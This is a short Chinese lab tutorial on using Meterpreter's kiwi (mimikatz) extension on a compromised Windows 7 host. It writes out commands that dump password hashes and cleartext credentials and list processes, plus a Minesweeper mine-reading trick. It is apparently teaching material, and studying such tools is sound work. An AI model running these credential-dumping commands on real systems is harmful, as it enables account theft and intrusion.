利用mimikatz插件获取内网相关信息

简介: 利用mimikatz插件获取内网相关信息

环境:小攻:Kali 2020,ip:192.168.1.133


         小受:win7 x86,ip:192.168.1.137



一、生成木马及监听主机参考上篇文章:


二、利用mimikatz获取内网相关信息


1、加载mimikatz


meterpreter > load kiwi


0a2653c851af460fa595bd959398a8f1.png


2、查看帮助信息


meterpreter > help kiwi


0eacb84100b54626af849e6b562bf92a.png


3、获取用户的hash值


meterpreter > creds_msv


2d65d23f6d4748949b924e4057485923.png


4、获取明文密码


meterpreter > creds_wdigest


2e9b90b2ca334476abebe75bafe6eeaa.png


5、查看当前主机运行的进程


meterpreter > kiwi_cmd process::list


4cebaac233b3433da32a72337a77fc60.png 6de278e6d6694ce5bb08e7e842b7e74b.png


三、获取扫雷小游戏的地雷位置


1、在小受上运行扫雷


7a399525ddec4b77923c464820b33738 (1).png


2、在小攻上运行下面命令即可获取地雷位置


meterpreter > kiwi_cmd minesweeper::infos


7a399525ddec4b77923c464820b33738.png 8ec4f2997fb246878c34ecd6d122b7c6.png


禁止非法,后果自负

目录
相关文章
|
4月前
|
存储 网络协议 Ubuntu
如何在Ubuntu安装配置SVN服务端并实现无公网ip访问内网资料库
如何在Ubuntu安装配置SVN服务端并实现无公网ip访问内网资料库
76 0
|
5月前
|
缓存 网络协议 数据可视化
可视化文件编辑与SSH传输神器WinSCP如何公网远程访问本地服务器
可视化文件编辑与SSH传输神器WinSCP如何公网远程访问本地服务器
|
5月前
|
SQL 监控 数据库连接
实现基于内网管理监控软件的用户身份验证系统的PHP代码详解
随着信息技术的不断发展,内网管理监控软件的需求也日益增长。为了确保系统的安全性,用户身份验证成为了至关重要的一环。本文将详细介绍如何通过PHP代码实现基于内网管理监控软件的用户身份验证系统,并提供一些代码示例。
230 0
|
11月前
|
Shell
Mac终端配置网络代理
Mac终端配置网络代理
142 0
|
安全 数据安全/隐私保护
利用mimikatz插件获取内网相关信息
利用mimikatz插件获取内网相关信息
68 0
利用mimikatz插件获取内网相关信息
|
安全 Shell 网络安全
【内网安全-横向移动】WMI-WMIC命令&相关内网工具
【内网安全-横向移动】WMI-WMIC命令&相关内网工具
489 0
【内网安全-横向移动】WMI-WMIC命令&相关内网工具
|
安全 Shell 网络安全
|
缓存 负载均衡 网络协议
windows之DNS7种资源记录和flushdns命令清除DNS缓存以及nslookup解析域名和ipconfig/all命令查看网络配置使用总结
windows之DNS7种资源记录和flushdns命令清除DNS缓存以及nslookup解析域名和ipconfig/all命令查看网络配置使用总结
433 0
windows之DNS7种资源记录和flushdns命令清除DNS缓存以及nslookup解析域名和ipconfig/all命令查看网络配置使用总结
|
Oracle 安全 关系型数据库
远程winodws 出现身份验证错误
连接的时候出现身份验证错误
276 0
远程winodws 出现身份验证错误
|
Web App开发 Shell 网络安全
基于SSH隧道+chrome插件SwitchyOmega访问内网机器
背景:客户的服务在线下IDC,访问服务器通过VPN连接到IDC,但VPN连接后只放行了特性端口比如80,服务器部署了grafana系统之后不想与现有的80共用一个端口。比如grafana应用监听除80之外的3000端口,在不通过客户邮件申请其他端口的情况下,是否有其他办法呢?本文基于SH隧道+chrome插件SwitchyOmega访问IDC的3000端口画了架构图便于理解,如下图所示正常访问路线A,但由于防火墙的限制无法访问除允许的端口,所以我们想通过阿里云的服务器做ssh隧道(阿里云与IDC机器通过专线连接,端口未做限制),也就是图中的线路B。
6891 0